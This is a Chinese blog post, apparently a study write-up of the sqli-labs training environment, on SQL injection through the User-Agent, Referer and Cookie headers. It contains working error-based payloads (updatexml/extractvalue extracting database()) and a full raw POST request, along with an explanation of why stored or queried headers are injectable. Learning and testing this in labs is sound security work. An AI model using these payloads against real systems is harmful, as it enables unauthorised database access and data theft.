SQL注入之HTTP请求头注入

已于 2023-03-31 13:51:24 修改
阅读量1.3k 收藏 2
点赞数 2
文章标签: sql http 数据库 web安全
于 2023-03-22 18:20:30 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_52310755/article/details/129716015
版权

Ps: 先做实验,在有操作的基础上理解原理会更清晰更深入。

一、实验 sqli-lab

1. User-Agent注入

  • 特点:登陆后返回用户的 User-Agent --> 服务器端可能记录用户User-Agent

703d0c6f-0f55-4500-a971-b9d0cf652954

  • 输入不合法数据报错

4aca6065-85d6-43dd-89b0-16a7caa4597a

  • payload:' and updatexml(1,concat("~",database(),"~"),1),'','')-- clay

  • 数据包
POST /sqli-labs/Less-18/index.php HTTP/1.1
Host: 10.49.102.86
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 38
Connection: close
X-Forward-For:
User-Agent:' and updatexml(1,concat("~",database(),"~"),1),'','')-- clay
Upgrade-Insecure-Requests: 1

submit=Submit&uname=admin&passwd=admin
  • 备注:

该注入是insert语句的注入,完整SQL语句为:

$insert="INSERT INTO `security'. 'uagents'( uagent', ' ip_address', 'username')VALUES ( '$uagent' ,'$IP', $uname)";
payload有效备注
‘,’‘,’') and updatexml(1,concat(“~”,database(),“~”),1)先闭合insert
’ and updatexml(1,concat(“~”,database(),“~”),1),‘’,‘’)-- clay`后闭合insert

总结:insert类型的SQL注入时,在注入点闭合后就添加要执行的语句,而不是,闭合完整个insert语句后再添加要执行的语句。

2. Referer注入

特点: 返回用户的Referer,可能后端会记录该值

3726faf2-3584-4891-99e5-0bc3efb17fdb

85289be8-628f-49f0-995c-73d63c69c0a2

payload12138' and extractvalue(1,concat("~",database())) ,'') -- clay

b68e69f1-db3f-47c4-bcc6-6cedf52ade72

3. Cookie注入

特点: 返回,后端可能记录User-Agent和Cookie

90f536c0-61f5-4ee1-951b-6954bb5d96bc

把cookie的值删除后:

2597990e-329c-4dae-aed5-35a20e4550ce

2e912a1c-f84b-430c-877f-6d1f431d1194

payload: ' and updatexml(1,concat("~",database(),"~"),1) -- clay

fa799001-4aab-44cc-b85d-cf2f8b3a7b62

二、 HTTP头部注入讲解

一下均为自己的理解,讲的大白话一点,粗体是核心。

原理:

HTTP头部注入产生的核心原因就是,后端存在查询或记录HTTP请求头内容(数据库交互)

实验一:后端记录 User-Agent ,insert 类型的注入

实验二:后端记录 Referer ,insert 类型的注入

实验三:后端查询 cookie ,select 类型的注入

不同的注入类型存在不同的闭合方式,这个一点要注意,除上述闭合类型以外,当搜索框中存在注入时,可能需要%的闭合(模糊查询 like %xxx%)

三、总结

在这里还是再次强调一下SQL注入产生的条件:用户输入的语句带入到数据库执行

  1. 参数可控

  2. 带入到数据库执行

HTTP头部注入也是一模一样,用户可以控制HTTP请求头,后端带入到数据库执行,这两个条件缺一个都不可以!

如果对你有所帮助拜托拜托点赞收藏加评论666,更多文章内容欢迎访问笔者博客 :xclay.net

xclay
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
Sql 注入原理、应用与特征
weixin_45088761的博客
07-19 694
本文主要对sql注入的原理、应用、特征做一个总结
sql注入资料.zip
04-17
QL注入SQL Injection)是一种针对数据库驱动的应用程序的安全漏洞攻击技术。攻击者通过在应用程序的...拒绝服务:攻击者可以利用SQL注入发起大量的恶意请求,导致数据库服务器过载,从而造成拒绝服务攻击(DoS)。
SQL注入——HTTP注入
qq_52072846的博客
02-18 2711
实验目的 理解HTTP部字段User-Agent、Referer、Cookie、X-Forwarded-For等的含义 和作用,掌握HTTP注入的原理、方法及基本流程。 实验原理 有时候,后台开发人员为了验证客户端HTTP Header(比如常用的Cookie验证 等)或者通过HTTP Header信息获取客户端的一些信息(比如 User-Agent. Accept字段等),会对客户端HTTP Header进行获取并使用SQL语句进行处理,如果此时没有足够的安全考虑,就可能导致基于HTTP Hea
sql注入的其他注入
weixin_46954909的博客
04-05 811
本篇主要记录:sql注入中的cookie处的注入,user-ager处的注入,referer处的注入
sql-lib注入http注入
weixin_43803070的博客
05-07 447
http注入包括好多种: User-Agent注入 User-Agent、Content-Type等只要是http包中存在的都可以进行篡改。在这再说下User-Agent的注入和Content-Type的注入,其他的就不详细赘述。基本原理大同小异。最后会进行总结。 一般使用user-Agent,有两种场景一是记录访问者的信息,如什么浏览器、操作系统版本等。二是获取客户的user-Agent...
SQL请求注入
weixin_30412013的博客
08-01 355
请求注入   请求注入就是将http请求中的一些部进行注入,因为这些部和数据库产生了交互,那么它们就有可能存在注入。下面是一个http请求,让我们看一    可能存在注入的点:   ①Host(主机)   在http1.0中没有Host字段,在http1.1中,增加这个字段,http协议的本质是建立tcp连接,而建立连接则需要知道对方的IP和端口号,然后才能发送...
SQL注入-HTTP的一些注入
m0_53820621的博客
08-16 1441
有时因为需要,会将客户的请求中一些数据与数据库进行交互,比如用户的cookie,统计用户点击链接的来源referer,统计用户操作系统User-Agent,和用户的真实地址,忘记对其添加过滤,就造成了注入漏洞。...
红帆OA(医疗版)漏洞细节未授权SQL注入请求注入数据包
最新发布
05-06
红帆OA(医疗版)是**一款专为医疗机构设计的办公自动化软件,旨在提高医院...需要注意的是,尽管红帆OA(医疗版)提供了强大的功能和广泛的应用场景,但任何软件系统都可能存在一定的安全风险,例如SQL注入漏洞等。因
SQL注入思路详解
12-14
一、SQL注入可以分为三个步骤 1.识别Web应用与数据库交互的可能输入(识别潜在注入点) 2.SQL注入语句测试 3.根据服务器返回判定注入语句是否影响了SQL执行结果以判断是否存在SQL注入     2.识别Web应用与数据库...
php防止sql注入的方法详解
12-18
 所谓SQL注入式攻击,就是攻击者把SQL命令插入到Web表单的输入域或页面请求的查询字符串,欺骗服务器执行恶意的SQL命令。在某些表单中,用户输入的内容直接用来构造(或者影响)动态SQL命令,或作为存储过程的输入...
分享一个简单的sql注入
12-16
所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意)的SQL命令注入到后台数据库引擎执行的能力...
SQL 存储过程发送HTTP请求
08-12
在网上找到的,能在SQL的存储过程中发送HTTP请求SQL语句,个人觉得还不错,很好用,拿来分享下。
SQL注入HTTP注入漏洞
Eagle_pompom的专栏
04-25 4054
输入参数主要覆盖范围有: HTTP 查询字符参数(GET):输入参数通过URL发送 HTTP 正文参数(POST):输入参数通过HTTP正文发送 HTTP Cookie参数:输入参数通过HTTP cookie发送 HTTP Headers:HTTP提交应用程序使用的,包括User-agent和Referer字段 潜在的HTTPSQL注入有:Cookie, User-agent, R...
SQL-labs的第18关——http请求注入(User-Agent)报错注入
qq_73393033的博客
07-21 392
并且,在判断闭合方式时,我们发现该网站会返回错误,说明该网站适合使用报错注入。我们这次使用extractvalue函数进行报错注入。我们在截取的数据包中的User-Agent上加上一个'。它显示了User-Agent,我们大胆猜测注入点在这里。通过改变mid函数的后面两个参数可以改变返回的内容。很显然,这里的数据没有显示完全。账号:admin ,密码:admin。这说明闭合方式就是'。
HTTP请求引发的注入问题 (SQL注入)
CSDN
08-12 5226
注入的产生原因是因为程序员没有将COOKIE进行合法化检测,并将其代入到了数据库中查询了且查询变量是可控的,当用户登录成功后会产生COOKIE,每次页面刷新后端都会拿着这个COOKIE带入数据库查找,这是非常危险的.HTTP_CLIENT_IP:该属性是PHP内置属性,同样取得的是客户端的IP,同样可控,如果带入数据库,则会产生注入问题。User-Agent 请求,该请求携带的是用户浏览器的标识信息,如果此时带入数据库查询,则同样会触发注入问题的产生。查询数据库同样可以爆出,数据库的版本号。
HTTP注入
weixin_59872639的博客
02-18 1470
HTTP Header概述 HTTP工作原理 HTTP报文类型 请求报文(HTTP Request):由客户端发给服务器的消息,其组成包括请求行(Request-Line)、请求域(Header-Field)和请求体(Entity-Body) 响应报文(HTTP Response):由服务器回复给客户端的消息,其组成包括状态行(Status-Line)、响应域(Header-Field)和响应体(Entity-Body) HTTP请求报文组成 HTTP请求方法 HTTP响.
报错注入HTTP请求注入
一个普普通通的博客
03-01 670
报错注入HTTP请求注入
sql注入HTTP注入
hhhshd的博客
11-14 3779
HTTP注入 原理: 一般在通过获取部的信息用于数据的分析,通过部可以向数据库发送查询信息,所以构造恶意的语句结构就可以向数据库进行信息查询。本次HTTP注入实验将在sqlilabs靶场中的第十八题进行注入 此图片为sqlilabs靶场中第十八题中的php代码环境,从代码环境中,我们可以分析到对于Post注入方式,还是通过魔术引号的方式进行了防护,但是在红框中的代码却露出了马脚 $ uagent = $_SERVER [‘HTTP_USER_AGENT’]; $ IP = $_SERVER
mssql发送http请求
Leonshi001的专栏
11-25 1517
-- 通用读取获取数据存储过程 --开启Sql Server 通讯配置-- sp_configure 'show advanced options', 1; GO RECONFIGURE; GO sp_configure 'Ole Automation Procedures', 1; GO RECONFIGURE; GO EXEC sp_
post请求SQL注入
03-10
Post请求SQL注入是一种常见的网络攻击方式,攻击者通过在Post请求注入恶意SQL语句,从而获取或篡改数据库中的数据。为了防止这种攻击,开发者需要对用户输入的数据进行严格的过滤和验证,确保输入的数据符合预期的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值